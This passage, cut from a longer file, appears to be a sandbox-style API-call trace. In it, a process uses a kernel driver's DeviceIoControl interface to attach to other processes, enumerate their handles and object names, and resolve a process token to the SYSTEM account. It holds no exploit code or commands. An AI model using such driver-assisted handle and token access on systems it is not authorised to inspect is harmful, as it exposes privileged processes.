Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0136.358] CloseHandle (hObject=0xc4) returned 1 [0136.358] CloseHandle (hObject=0xc8) returned 1 [0136.359] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.359] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.359] PsAcquireProcessExitSynchronization () returned 0x0 [0136.359] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.359] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800358cea0, HandleInformation=0x0) returned 0x0 [0136.359] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.359] PsReleaseProcessExitSynchronization () returned 0x2 [0136.359] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.359] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002aed044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002aed044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.359] ObfDereferenceObject (Object=0xfffffa800358cea0) returned 0x1 [0136.359] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.360] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.360] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.360] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.360] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.360] PsAcquireProcessExitSynchronization () returned 0x0 [0136.360] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.360] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800d8718e0, HandleInformation=0x0) returned 0x0 [0136.360] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.360] PsReleaseProcessExitSynchronization () returned 0x2 [0136.360] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.360] ObQueryNameString (in: Object=0xfffffa800d8718e0, ObjectNameInfo=0xfffffa8002aee044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002aee044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.361] ObfDereferenceObject (Object=0xfffffa800d8718e0) returned 0x1 [0136.361] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.361] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.361] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.361] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.361] PsAcquireProcessExitSynchronization () returned 0x0 [0136.361] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.361] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003657dd0, HandleInformation=0x0) returned 0x0 [0136.361] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.362] PsReleaseProcessExitSynchronization () returned 0x2 [0136.362] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.362] ObQueryNameString (in: Object=0xfffffa8003657dd0, ObjectNameInfo=0xfffffa8002b7a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002b7a044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.362] ObfDereferenceObject (Object=0xfffffa8003657dd0) returned 0x2 [0136.362] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.362] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.362] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.362] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.362] PsAcquireProcessExitSynchronization () returned 0x0 [0136.362] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.363] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003652f20, HandleInformation=0x0) returned 0x0 [0136.363] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.363] PsReleaseProcessExitSynchronization () returned 0x2 [0136.363] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.363] ObQueryNameString (in: Object=0xfffffa8003652f20, ObjectNameInfo=0xfffffa8002b7b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002b7b044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.363] ObfDereferenceObject (Object=0xfffffa8003652f20) returned 0x1 [0136.363] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.363] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.363] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.364] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.364] PsAcquireProcessExitSynchronization () returned 0x0 [0136.364] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.364] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003497970, HandleInformation=0x0) returned 0x0 [0136.364] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.364] PsReleaseProcessExitSynchronization () returned 0x2 [0136.364] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.364] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.364] ObfDereferenceObject (Object=0xfffffa8003497970) returned 0x1 [0136.364] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.364] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.365] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.365] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.365] PsAcquireProcessExitSynchronization () returned 0x0 [0136.365] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.365] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003549c80, HandleInformation=0x0) returned 0x0 [0136.365] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.365] PsReleaseProcessExitSynchronization () returned 0x2 [0136.365] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.365] ObQueryNameString (in: Object=0xfffffa8003549c80, ObjectNameInfo=0xfffffa80025f17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0136.365] ObfDereferenceObject (Object=0xfffffa8003549c80) returned 0x2 [0136.365] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.366] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.366] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.366] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.366] PsAcquireProcessExitSynchronization () returned 0x0 [0136.366] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.366] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003695dd0, HandleInformation=0x0) returned 0x0 [0136.366] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.366] PsReleaseProcessExitSynchronization () returned 0x2 [0136.366] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.366] ObQueryNameString (in: Object=0xfffffa8003695dd0, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.366] ObfDereferenceObject (Object=0xfffffa8003695dd0) returned 0x1 [0136.366] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.367] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.367] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0136.367] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.367] PsAcquireProcessExitSynchronization () returned 0x0 [0136.367] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.367] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003539a50, HandleInformation=0x0) returned 0x0 [0136.367] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.367] PsReleaseProcessExitSynchronization () returned 0x2 [0136.367] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.367] ObQueryNameString (in: Object=0xfffffa8003539a50, ObjectNameInfo=0xfffffa80028f1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028f1044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.368] ObfDereferenceObject (Object=0xfffffa8003539a50) returned 0x1 [0136.368] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.368] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.368] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.368] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.368] PsAcquireProcessExitSynchronization () returned 0x0 [0136.368] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.368] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e8070, HandleInformation=0x0) returned 0x0 [0136.368] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.368] PsReleaseProcessExitSynchronization () returned 0x2 [0136.368] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.368] ObQueryNameString (in: Object=0xfffffa80034e8070, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.369] ObfDereferenceObject (Object=0xfffffa80034e8070) returned 0x2 [0136.369] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.369] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.369] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.369] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.369] PsAcquireProcessExitSynchronization () returned 0x0 [0136.369] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.369] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034f6070, HandleInformation=0x0) returned 0x0 [0136.369] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.369] PsReleaseProcessExitSynchronization () returned 0x2 [0136.369] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.369] ObQueryNameString (in: Object=0xfffffa80034f6070, ObjectNameInfo=0xfffffa8002947044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002947044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.369] ObfDereferenceObject (Object=0xfffffa80034f6070) returned 0x2 [0136.369] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.370] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.370] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0136.370] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.370] PsAcquireProcessExitSynchronization () returned 0x0 [0136.370] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.370] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e3070, HandleInformation=0x0) returned 0x0 [0136.370] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.370] PsReleaseProcessExitSynchronization () returned 0x2 [0136.370] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.370] ObQueryNameString (in: Object=0xfffffa80034e3070, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.370] ObfDereferenceObject (Object=0xfffffa80034e3070) returned 0x2 [0136.371] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.371] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.371] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.371] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.371] PsAcquireProcessExitSynchronization () returned 0x0 [0136.371] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.371] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034e1070, HandleInformation=0x0) returned 0x0 [0136.371] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.371] PsReleaseProcessExitSynchronization () returned 0x2 [0136.371] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.371] ObQueryNameString (in: Object=0xfffffa80034e1070, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.371] ObfDereferenceObject (Object=0xfffffa80034e1070) returned 0x2 [0136.371] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.372] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.372] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.372] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.372] PsAcquireProcessExitSynchronization () returned 0x0 [0136.372] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880051635d0) [0136.372] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034df070, HandleInformation=0x0) returned 0x0 [0136.372] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.372] PsReleaseProcessExitSynchronization () returned 0x2 [0136.372] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x7a [0136.372] ObQueryNameString (in: Object=0xfffffa80034df070, ObjectNameInfo=0xfffffa8002b7a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002b7a044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.373] ObfDereferenceObject (Object=0xfffffa80034df070) returned 0x2 [0136.373] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.373] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0xc8 [0136.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0136.374] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003653680, HandleInformation=0x0) returned 0x0 [0136.374] ObOpenObjectByPointer (in: Object=0xfffffa8003653680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000810) returned 0x0 [0136.374] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe8 [0136.374] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000810, DesiredAccess=0x8, TokenHandle=0xfffffa800370a340 | out: TokenHandle=0xfffffa800370a340*=0xc4) returned 0x0 [0136.374] ZwClose (Handle=0xffffffff80000810) returned 0x0 [0136.374] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.374] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0136.374] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0136.377] CloseHandle (hObject=0xc4) returned 1 [0136.377] CloseHandle (hObject=0xc8) returned 1 [0136.377] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.377] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.377] PsAcquireProcessExitSynchronization () returned 0x0 [0136.377] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.377] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003573070, HandleInformation=0x0) returned 0x0 [0136.377] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.378] PsReleaseProcessExitSynchronization () returned 0x2 [0136.378] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.378] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002aee044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002aee044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.378] ObfDereferenceObject (Object=0xfffffa8003573070) returned 0x1 [0136.378] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.378] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.378] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, 